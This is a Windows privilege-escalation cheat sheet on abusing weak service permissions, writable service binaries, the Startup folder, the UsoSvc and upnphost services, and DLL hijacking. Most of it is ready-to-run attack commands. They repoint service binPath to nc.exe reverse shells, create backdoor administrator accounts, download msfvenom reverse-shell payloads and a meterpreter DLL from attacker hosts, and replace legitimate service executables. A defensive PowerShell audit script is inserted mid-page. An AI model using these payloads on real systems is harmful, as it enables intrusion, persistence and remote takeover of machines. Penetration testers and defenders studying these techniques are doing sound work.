Incorrect permissions in services
1. Looking for weak permissions in services
- First we need to locate modifiable services and/or service binaries:
sc query
Get-Service | fl
wmic service list brief
powershell Get-Acl -Path "C:\Program Files\Vulnerable Services\Service 3.exe" | fl
Then, to get cleaner results (collects every non-system32 service path into a file and runs icacls on each):
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
Then we copy the output into a .txt file and grep it for the permissions we want.
If wmic is not available we can use sc.exe:
sc query state=all | findstr "SERVICE_NAME:" >> Servicenames.txt
FOR /F %i in (Servicenames.txt) DO echo %i
type Servicenames.txt
FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
To locate modifiable services with Metasploit, use the module exploit/windows/local/service_permissions
To locate modifiable services with SharpUp:
SharpUp.exe audit ModifiableServices
- Then we need to check file permissions:
Manually:
icacls (Windows Vista +)
cacls (Windows XP)
With Get-ServiceAcl.ps1 (https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/):
. C:\Tools\Get-ServiceAcl.ps1
Get-ServiceAcl -Name VulnService2 | select -expand Access
2. Exploit
- Weak Service Permissions
We are looking for the following service permissions: ServiceRights: ChangeConfig, Start, Stop
First we need to validate the current path:
run sc qc VulnService2
Next, upload a service binary payload and reconfigure the binary path on the vulnerable service:
mkdir C:\Temp
cd C:\Temp
upload C:\Payloads\tcp-local_x64.svc.exe
run sc config VulnService2 binPath= C:\Temp\tcp-local_x64.svc.exe
(The space after binPath= is intentional as this is how it's documented in sc's help documentation.)
Alternatively, we can add the current user to the Administrators group or create a new administrative user:
sc config VulnService2 binPath= "cmd.exe /c net localgroup administrators {Domain}\{user} /add" start= "demand" obj= "NT AUTHORITY\SYSTEM" password= ""
or
sc config VulnService2 obj= "NT AUTHORITY\SYSTEM" password= ""
sc config VulnService2 binPath= "cmd.exe /c net user hacker Password123! /add && net localgroup Administrators hacker /add"
Next, Validate that the path has indeed been updated:
run sc qc VulnService2
Then, if the service is currently running, we must stop and then start the service to execute our malicious binary:
run sc stop VulnService2
run sc start VulnService2
Then, to restore the previous binary path (the additional set of escaped quotes is necessary to keep the path fully quoted; otherwise you could introduce a new unquoted service path vulnerability):
run sc config VulnService2 binPath= \""C:\Program Files\Vulnerable Services\Service 2.exe"\"
- Weak Service Binary Permissions
We are looking for the following service binary permissions: BUILTIN\Users:(F), or (F) or (C) permissions for our user. This means we have write permission over that resource and can replace it with a malicious binary.
First make a copy of the service binary on which we have modify privileges:
download Service 3.exe
Then we make a copy of the payload whilst renaming it to the name of the legitimate binary:
copy "tcp-local_x64.svc.exe" "Service 3.exe"
Then attempt to upload it:
upload C:\Payloads\Service 3.exe
If this displays an error because the service is running:
run sc stop VulnService3
upload C:\Payloads\Service 3.exe
ls
run sc start VulnService3
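The checks from sections 1 and 2 (service DACL, service binary ACL, and the unquoted-path caveat) combined into one audit script. This is an added example, not code from the original page or from any tool it names; it assumes only the built-in sc.exe and Get-Acl, and the $lowPrivSids list is a choice you can extend.

```powershell
# Added example, not from the original page: audit every service for the three
# weaknesses above. Run elevated. Assumes only built-in sc.exe and Get-Acl.
$lowPrivSids = @('S-1-1-0', 'S-1-5-11', 'S-1-5-32-545', 'S-1-5-4')  # Everyone, Authenticated Users, Users, INTERACTIVE
# Service rights that allow changing binPath or the DACL: SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_ALL
$svcWriteMask  = 0x2 -bor 0x40000 -bor 0x80000 -bor 0x40000000 -bor 0x10000000
# File rights that allow replacing the binary: WriteData, AppendData, Delete, WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_ALL
$fileWriteMask = 0x2 -bor 0x4 -bor 0x10000 -bor 0x40000 -bor 0x80000 -bor 0x40000000 -bor 0x10000000

function Get-ServiceBinaryPath([string]$PathName) {
    # Drop arguments: take the quoted path, otherwise everything up to the first ".exe"
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.*?\.exe)') { return $Matches[1] }
    return $PathName.Trim()
}
function ConvertTo-Sid($Identity) {
    try { $Identity.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { $null }
}
function Get-WeakServiceDaclPrincipals([string]$Name) {
    # "sc.exe sdshow" prints the service object's SDDL; parse it rather than string-matching rights
    $sddl = (sc.exe sdshow $Name | Where-Object { $_ -match '^D:' }) -join ''
    if (-not $sddl) { return @() }
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)
    $sd.DiscretionaryAcl |
        Where-Object { $_.AceType -eq 'AccessAllowed' -and $_.SecurityIdentifier.Value -in $lowPrivSids -and
                       (($_.AccessMask -band $svcWriteMask) -ne 0) } |
        ForEach-Object { $_.SecurityIdentifier.Value }
}
function Get-WritableBinaryPrincipals([string]$Path) {
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return @() }
    $acl.Access |
        Where-Object { $_.AccessControlType -eq 'Allow' -and (ConvertTo-Sid $_.IdentityReference) -in $lowPrivSids -and
                       (([int]$_.FileSystemRights -band $fileWriteMask) -ne 0) } |
        ForEach-Object { $_.IdentityReference.Value }
}
Get-CimInstance Win32_Service | Where-Object { $_.PathName } | ForEach-Object {
    $bin = Get-ServiceBinaryPath $_.PathName
    [pscustomobject]@{
        Name            = $_.Name
        RunsAs          = $_.StartName
        Binary          = $bin
        WeakServiceDacl = (Get-WeakServiceDaclPrincipals $_.Name) -join ', '
        WritableBinary  = (Get-WritableBinaryPrincipals $bin) -join ', '
        UnquotedPath    = ($_.PathName -notmatch '^"' -and $bin -match ' ')   # the caveat from section 2
    }
} | Where-Object { $_.WeakServiceDacl -or $_.WritableBinary -or $_.UnquotedPath } | Format-List
```

Any service listed with a non-empty WeakServiceDacl or WritableBinary field is what the Get-ServiceAcl and icacls checks above would also flag; fix it by tightening the DACL (sc.exe sdset or icacls /remove) rather than by renaming the binary.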
3. Examples
An example of C code for a getsuid:
Then we can compile it with the following command:
i686-w64-mingw32-gcc windows-exp.c -lws2_32 -o exp.exe
Example of detection and exploitation of weak service permissions:
Detection
# Find all services authenticated users have modify access onto
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
if SERVICE_ALL_ACCESS then vulnerable
# Find all weak folder permissions per drive.
accesschk.exe /accepteula -uwdqs Users c:\
accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\
# Find all weak file permissions per drive.
accesschk.exe /accepteula -uwqs Users c:\*.*
accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.*
or
powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"
[*] Checking service permissions...
ServiceName   : daclsvc
Path          : "C:\Program Files\DACL Service\daclservice.exe"
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'daclsvc'
CanRestart    : True
or
winPEAS.exe
[+] Interesting Services -non Microsoft-(T1007)
daclsvc(DACL Service)["C:\Program Files\DACL Service\daclservice.exe"] - Manual - Stopped
YOU CAN MODIFY THIS SERVICE: WriteData/CreateFiles
[+] Modifiable Services(T1007)
LOOKS LIKE YOU CAN MODIFY SOME SERVICE/s:
daclsvc: WriteData/CreateFiles
Exploitation
# Attacker
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>
# Victim
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/nc.exe', '.\nc.exe')
sc config <SERVICENAME> binpath= "<PATH>\nc.exe <IP> <PORT> -e cmd.exe"
icacls {evil.exe or nc.exe} /grant Everyone:F
sc start <SERVICENAME>
or
net start <SERVICENAME>
Example of detection and exploitation of weak service executable permissions:
Detection
powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"
[*] Checking service executable and argument permissions...
ServiceName                     : filepermsvc
Path                            : "C:\Program Files\File Permissions Service\filepermservice.exe"
ModifiableFile                  : C:\Program Files\File Permissions Service\filepermservice.exe
ModifiableFilePermissions       : {ReadAttributes, ReadControl, Execute/Traverse, DeleteChild...}
ModifiableFileIdentityReference : Everyone
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'filepermsvc'
CanRestart                      : True
or
winPEAS.exe
[+] Interesting Services -non Microsoft-(T1007)
filepermsvc(Apache Software Foundation - File Permissions Service)["C:\Program Files\File Permissions Service\filepermservice.exe"] - Manual - Stopped
File Permissions: Everyone [AllAccess]
Exploitation
# Attacker
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > program.exe
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>
# Victim
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/program.exe', 'C:\Temp\program.exe')
copy /y c:\Temp\program.exe "C:\Program Files\File Permissions Service\filepermservice.exe"
icacls {evil.exe or nc.exe} /grant Everyone:F
sc start filepermsvc
Example of detection and exploitation of Startup applications:
Detection
C:\>icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup BUILTIN\Users:(F)
                                                             TCM-PC\TCM:(I)(OI)(CI)(DE,DC)
                                                             NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                                             BUILTIN\Administrators:(I)(OI)(CI)(F)
                                                             BUILTIN\Users:(I)(OI)(CI)(RX)
                                                             Everyone:(I)(OI)(CI)(RX)
If the user you're connected as has full access '(F)' to the directory (here BUILTIN\Users), then it's vulnerable.
Exploitation
# Attacker
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > program.exe
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>
# Victim
cd "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/program.exe', '.\program.exe')
To execute it with elevated privileges we need to wait for someone in the Admin group to login.
Examples with specific CVEs:
Example with Windows 10 - CVE-2019-1322 UsoSvc
Prerequisite: Service account
PS C:\Windows\system32> sc.exe stop UsoSvc
PS C:\Windows\system32> sc.exe config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe 10.10.10.10 4444 -e cmd.exe"
PS C:\Windows\system32> sc.exe config UsoSvc binpath= "C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe"
PS C:\Windows\system32> sc.exe config UsoSvc binpath= "cmd /C C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"
PS C:\Windows\system32> sc.exe qc usosvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: usosvc
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START  (DELAYED)
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Update Orchestrator Service
        DEPENDENCIES       : rpcss
        SERVICE_START_NAME : LocalSystem
PS C:\Windows\system32> sc.exe start UsoSvc
Example with Windows XP SP1 - upnphost
# NOTE: the spaces after "binpath=", "obj=", "password=" and "depend=" are mandatory for this exploit to work!
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.73 4343 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
sc config upnphost depend= ""
net start upnphost
If it fails because of a missing dependency, try the following commands:
sc config SSDPSRV start= auto
net start SSDPSRV
net stop upnphost
net start upnphost
sc config upnphost depend= ""
Using accesschk from Sysinternals or accesschk-XP.exe (github.com/phackt):
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
RW SSDPSRV
        SERVICE_ALL_ACCESS
RW upnphost
        SERVICE_ALL_ACCESS
accesschk.exe -ucqv upnphost
upnphost
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\Authenticated Users
        SERVICE_ALL_ACCESS
  RW BUILTIN\Power Users
        SERVICE_ALL_ACCESS
sc config <vuln-service> binpath= "net user backdoor backdoor123 /add"
sc config <vuln-service> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc stop <vuln-service>
sc start <vuln-service>
sc config <vuln-service> binpath= "net localgroup Administrators backdoor /add"
sc stop <vuln-service>
sc start <vuln-service>
4. DLL Hijacking
Find missing DLL:
- Find-PathDLLHijack (PowerUp.ps1)
- Process Monitor: filter for "Name Not Found" results
Compile a malicious dll:
For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll
Content of windows_dll.c:
Or we can use msfvenom to create the malicious .dll:
msfvenom -p windows/meterpreter/reverse_https LHOST=172.16.48.10 LPORT=4444 -f dll > {name of the .dll}
Then download the dll into the original dll's directory, for example:
powershell -c iex (New-Object Net.WebClient).DownloadFile('http://172.16.48.10/UxTheme.dll', 'C:\Program Files (x86)\Agnitum\Outpost Firewall 1.0\UxTheme.dll')
Then reboot: shutdown /r /t 0
We need to reboot the Windows machine for the .dll to be loaded; don't forget to start your multi/handler beforehand.
It may take a few minutes for the machine to come back online and the exploit to work.